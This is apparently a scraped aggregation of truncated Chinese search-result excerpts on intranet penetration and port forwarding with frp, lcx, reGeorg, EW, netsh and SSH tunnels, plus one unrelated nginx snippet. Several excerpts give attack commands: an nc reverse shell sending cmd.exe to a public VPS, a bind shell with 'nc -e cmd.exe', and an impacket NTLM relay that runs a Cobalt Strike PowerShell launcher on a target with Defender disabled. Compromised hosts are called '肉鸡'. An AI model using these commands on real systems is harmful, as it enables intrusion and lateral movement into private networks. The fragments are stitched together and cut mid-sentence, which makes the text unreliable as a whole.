工具介绍 Frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...服务器地址 server_addr = x.x.x.x #服务器绑定端口 server_port = 7000 #服务器连接密码 token = 12345678 #服务名称(自定义) [ssh] #转发协议类型
Hash转发 如果我们捕获到NTLM hash的域用户是某台远程主机的本地管理员,我们则可以执行pass-the hash攻击来获得远程代码执行。...虽然Net-NTLM hash不能直接用来hash传递,但我们可以将它转发到另一台主机。 需要注意的是仅在SMB签名被禁用的情况可以转发。SMB签名仅在域控是默认启用的。...在转发成功后,可以执行我们指定的命令。这里我们执行一个cobaltstrike PowerShell上线命令。...hash,-t指定转发的目标主机IP,这里为appsrv01的IP,-c指定要执行的命令: sudo impacket-ntlmrelayx --no-http-server -smb2support...需要注意的是,这里只是为了介绍Hash转发的概念,所以APPSRV01的Windows defender是关闭状态。
工具使用 反向连接 场景概述: A主机外网 无法访问B内网机器 B内网机器 可以访问A外网机器 A:103.45.99.224(公网vps) ? ? B: 10.211.55.4(内网机器) ? ?...B:内网执行 Nc.exe 103.45.99.224 8787 ? ? 此时A主机公网vps就会收到B内网主机的cmd ? ?...正向连接 场景概述: A内网 可以访问 外网B B外网 不能访问 内网A 在外网B主机上执行nc -l -p 5555 -e cmd.exe ? ?...随后在内网A上执行nc –nvv 103.45.99.224 5555 ? ?...注:如果客户端【相当于内网】连接服务器【相当于外网】,想获取服务器的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想获取客户端的shell,那么称为反向shell,另外有关于nc在
数据进行本地端口转发: ? 成功通过8888端口将流量转发至3389服务: ? 正向端口转发 假设我们已经拿下了外网服务器的命令行权限,以及内网服务器账号、密码。...外网服务器开始进行流量转发: ? 成功访问到内网服务器远程桌面: ? 反向端口转发 假设这次拿下了外网服务器、内网服务器的命令行权限,并知道内网服务器账号、密码。...想要通过攻击机,远程连接内网服务器远程桌面服务。但由于内网防火墙包过滤策略,不允许外网服务器访问它。 此时可以通过反向端口转发,由内网服务器主动发起转发。 ?...正向端口转发 假设我们已经拿下了外网服务器的命令行权限,以及内网服务器账号、密码。 此时想让攻击机能够访问内网服务器的3389端口。可以通过外网服务器来充当跳板,进行正向端口转发。 ?...成功转发至内网服务器3389端口: ? ?
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 内网ip>内网端口> 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ..../portmap -m 3 -h1 内网主机ip> -p1 内网主机端口> -h2 -p2 例: 将内网主机(172.17.0.13)的22端口转发到公网主机(103.45.99.224...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 收到会话,随后使用xshell链接 ? ? ?
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。...故内网已经打通,说实话lcx的工具如同在路由器上面做了端口转发。 ?...reDuh也是一款内网渗透利器,这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。...服务端是个webshell,工具里面针对不同服务器有aspx,php,jsp三个版本,客户端是java写的,本机执行最好装上JDK软件。 ? ?...连接成功会有欢迎提示,之后输入命,在java命令窗口执行 [createTunnel]1234:127.0.0.1:3389 ? ?
内网转发工具的使用 目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理...(Linux) Netsh实现端口转发 Netsh实现SSH到内网主机(远程端口转发) Netsh实现3389到内网主机(远程端口转发) Netsh实现本地端口转发 LCX实现端口转发 LCX实现本地端口转发...这时候,我们可以通过 端口转发(隧道) 或将这台外网服务器设置成为 代理,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转发。...(远程端口转发) 现在我们有这么一个环境,我们获得了公网服务器的权限,并且通过公网服务器进一步的内网渗透,得到了内网主机的权限。...于是,我们可以在中间Web服务器上利用LCX进行端口转发,将内网Web主机的80端口转发到公网Web服务器的8080端口上,那么我们访问公网Web服务器的8080端口就相当于访问内网Web服务器的80端口
点击上方“蓝字”关注我们 Frp实现端口转发内网穿透 准备工作 1.1 frp是什么 简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP...frp实际使用时,会按照端口号进行对应的转发, 上面frpc.ini的rdp、smb字段都是自己定义的规则,自定义端口对应时格式如下。 “[xxx]”表示一个规则名称,自己定义,便于查询即可。...“type”表示转发的协议类型,有TCP和UDP等选项可以选择,如有需要请自行查询frp手册。 “local_port”是本地应用的端口号,按照实际应用工作在本机的端口号填写即可。...内网穿透+ Metasploit渗透windows,所以这里不提及免杀并且关闭防护软件。...=msf对应的公网端口1.exe lhost:必需设置为你的公网ip lport:设置你在frpc.ini的[msf] remote_port = xxxx 只有通过服务器的xxxx端口数据包才能成功转发到我们的
目前开发多数趋于前后端分离,后端开发人员有的时候懒得搭建前端环境,可是写后端又不便于联调,经常被这个困扰中,本文介绍如何用nginx 转发。 前提:有一套完整的环境,可以访问 整个环境。...步骤: 1、本地项目启动,eg:localhost:8080 2、配置本地 host 127.0.0.1 wangzhi.com 说明:需要把环境地址,转到本地,才能走本地的nginx转发 3、安装nginx
0x01 背景前言 在平时的渗透测试过程中经常会用到端口转发,通过代理脚本将内网流量代到本地进行访问,方便下一步对内网进行横向渗透。...当拿下内网一台主机的控制权后,需要通过代理转发的方式进入内网,整理几种常见的内网代理转发方法。 本次以远程桌面连接来进行说明,介绍几种常用的连接方式。...0x04 转发工具使用 0x04.1 msf反弹木马 使用条件:服务器通外网,拥有自己的公网ip msf是我进行内网渗透中用的最多的工具,它内置了很多强大的功能,用起来相当方便。...msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。...0x04.2 lcx.exe 使用条件:服务器通外网,拥有自己的公网ip lcx是一个经典的端口转发工具,直接把3389转发到公网的vps上。
端口转发和端口映射 目录 端口转发和端口映射 两者的区别 端口转发和端口映射 介绍端口转发和端口映射之前先了解两个概念:正向连接 和 反向连接 正向连接:你的机器连接目标机器 反向连接:目标机器反连你的机器...比如,我们在内网中有一台Web服务器,但是外网中的用户是没有办法直接访问该服务器的。...在这过程中,路由器充当了一个反向代理的作用,他保护了内网中主机的安全 端口转发:端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。...比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。...这就是端口转发,其转发一个端口收到的流量,给另一个主机 两者的区别 按理解意思,是用不同的方法实现同样的目标。 端口转发:你给我了,我打开看看,发现这上面标志显示是要给张三,那么我就给张三去。
不过其实除了这个功能,它的隧道转发功能更是吸引人。下面是个人根据自己的需求以及在网上查找的资料配合自己的实际操作所得到的一些心得。...-L port:host:hostport 将本地机(客户机)的某个端口转发到远端指定机器的指定端口....可以在配置文件中指定端口的转发. 只有 root 才能转发特权端口....可以在配置文件中指定端口的转发. 只有用 root 登录远程主机才能转发特权端口....只有 root 才能转发特权端口. 可以在配置文件中指定动态端口的转发. -C Enable compression. 压缩数据传输。
转发方式一共有三种,分别是:动态转发,本地转发,远端转发。...实验环境 一台攻击者kali一台跳板机kali一台内网centos ? 目标:从攻击者访问到内网192.168.254.150的服务 实验步骤 1....先在攻击者上执行将内网的80端口转发到攻击者的12345端口,当访问攻击者的12345端口时,相当于访问了内网的80 ssh -N -L 54321:192.168.254.150:22 root@192.168.0.137...(远端)的网络里将内网的端口转发到vps的某个端口上,以达到外网可以访问的目的在这里kali充当我们的vps 实验环境 一台攻击者kali一台跳板机kali一台内网centos ?...目标:从攻击者访问到内网192.168.254.150的服务 实验步骤 1.先在跳板机上执行将内网的80端口转发到攻击者的12345端口,当访问攻击者的12345端口时,相当于访问了内网的80 root
我们可以将内网服务器A的22端口远程转发到公网服务器的1234端口。...:8888 localhost #意思就是将本地监听的1234端口的流量都转发给本地的8888端口 接着,在黑客机器C的操作,通过ssh公网服务器B的某个端口实现ssh内网服务器A的22号端口 ssh...8888端口,于是内网服务器A将本地的22号端口反向代理到了公网服务器B的8888端口,公网服务器B又将8888端口的流量转发到了本地的1234端口,所以黑客SSH连接到了内网服务器A。...在内网A机器上的操作: ssh -p 1234 root@100.100.10.12 #ssh连接到公网服务器的1234端口 参考文章:实战SSH端口转发 使用SSH反向隧道进行内网穿透...相关文章:内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 责编:vivian 来源:谢公子博客
网盘选择性对外开放 免费10~50G 速度(目前一般般,稳定1Mb/s) 搭建所需 源码(软件) 内容 地址 网盘 http://dzzoffice.com/ 内网穿透 https://github.com.../fatedier/frp 硬件 一台无公网的服务器(内网主机) 一台有公网的服务器(外网主机) 一台电脑(自己操作的) 前言 资源参考 部分请参考文章我以前发布的文章 Centos 搭建 Frp 内网映射服务...Frp 内网映射 —— 前端 [客户端] 搭建 废话 (这还是一篇水文)其实这篇文章就是记一次搭建一次对外开放的一个内网网盘,采用的是我以前发布的博文 Centos 搭建 Frp 内网映射服务 支持。...搭建内网穿透 外网主机 本次搭建采用 Frp 版本为 v0.35.1 (Centos7系统) 创建域名 创建两个地址,一个作为网盘,一个作为后端。...或者参考文章:Centos 搭建 Frp 内网映射服务 内网主机 依旧需要在主机内下载 frp # 下载(建议相同版本) wget https://github.com/fatedier/frp/releases
项目介绍 Fuso是一款体积小,快速, 稳定, 高效, 轻量的内网穿透, 端口转发工具,支持多连接,级联代理,传输加密 项目特性 ✔ 项目使用 Step 1:下载解压得到 fus,fuc两个程序, 将fus...端口转发 fuc --forward-host xxx.xxx.xxx.xxx --forward-port --forward-host: 转发到的地址 --forward-port: 转发到的端口...如: 转发流量到内网 10.10.10.4:3389 > fuc --forward-host 10.10.10.4 --forward-port 3389 2. socks5: fuc..., 认证账号, 默认账号 anonymous --socks: 可选的, 开启socks5代理, 未指定--su的情况下不会转发udp 如: 开启udp转发与密码认证 > fuc --...指定穿透成功时访问的端口 fuc -b xxxx -b | --visit-bind-port: 可选的, 默认随机分配 如: 访问外网端口 8888 转发到内网 80 > fuc
1、实验环境 2、实验条件: 3、注意事项: 4、实践操作: 1、实验环境如下 服务器均采用CentOS 6.5 服务器名 内网地址 外网地址 A 10.1.1.212 54.227.20.225 B...10.1.2.36 None 2、实验条件: 服务器A设置路由转发并通过iptables进行端口转发,服务器B上开启memcached服务,使访问服务器A可以连接到服务器B的memcached服务 3...、注意事项: 本次仅作测试环境,所以外部安全组已全部放开,路由表已设置互通 4、实践操作: 在服务器A上进行操作 1、开启内核转发 vi /etc/sysctl.conf 将 net.ipv4.ip_forward...to-destination 10.1.2.36:11211 #将访问10.1.1.212:11211的请求发送到 10.1.2.36:11211 service iptables save ### 拓展 把eth0的流量转发出去
下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...那么很有可能就是内网服务器。我们dos执行ipconfig可以看到。 这样的就是内网服务器了。...优点,搞定内网肉鸡....肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口...3389连接时格式 127.0.0.1:3333 内网转发姿势 一、lcx 的使用 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave
相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?...这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Ngrok。...二、转发3389端口到本地 1.在Kali中执行lcx监听和转发命令: ..../portmap -m 2 -p1 8848 -p2 33891 P1为本地监听的端口(与ngrok转发的端口一致) P2为本地转发的端口(随便命名,但不能是已被占用的端口) ? ?...Ngrok服务器地址与隧道端口+本地需要转发的端口 ?
前言 假设我们有两台服务器处于同一内网中,但是我们只有一个公网IP 那么我们怎样在外部访问没有公网IP的服务器呢?...机器 内网IP 公网IP 用户名 备注 A 192.168.0.2 123.123.123.123 roota 外网服务器,相当于桥梁的作用 B 192.168.0.3 无 rootb 目标服务器,处于内网...注意这里是为了后续文章便于理解用户名才用的roota和rootb 请根据实际情况配置 解决方法 通俗地说就是: 在机器B上做到A机器的反向代理 在A机器上做正向的代理实现本地端口的转发 实现前的准备...ssh -fCNL *:20022:localhost:20122 localhost 在此20022端口为本地转发端口,负责和外网进行通信,并将数据转发的20122这个端口,实现了可以从其他机器访问的功能...免密码登陆 在内网机器B上操作 ssh每次重连都需要键入密码,故在此首先设置免密码登陆到内网 生成公钥私钥 默认生成位置为当前用户目录下的.ssh/id_rsa.pub ssh-keygen 将key
领取专属 10元无门槛券
手把手带您无忧上云